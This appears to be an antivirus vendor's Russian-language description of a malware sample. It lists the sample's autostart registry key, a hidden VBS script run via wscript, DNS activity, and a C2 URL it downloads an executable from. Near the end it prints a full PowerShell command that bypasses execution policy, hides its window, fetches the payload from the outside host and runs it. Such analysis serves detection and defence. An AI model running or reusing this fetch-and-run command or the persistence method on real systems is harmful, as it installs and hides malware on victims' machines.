Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows] 'Load' = 'C:\Users\Public\config.vbs'
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '<SYSTEM32>\wscript.exe' C:\Users\Public\config.vbs
Загружает и запускает на исполнение
- http://poc.howielab.com/c2/agent/20171107212054 как scannerdriver.exe
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\config.txt
Присваивает атрибут 'скрытый' для следующих файлов
- C:\users\public\config.vbs
Перемещает следующие файлы
- C:\users\public\config.txt в C:\users\public\config.vbs
Сетевая активность
UDP
- DNS ASK po#.##wielab.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep Bypass -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadFile('http://poc.howielab.com/C2/Agent/20171107212054','ScannerDriver.exe'));Start-Process 'ScannerDriver....' (со скрытым окном)
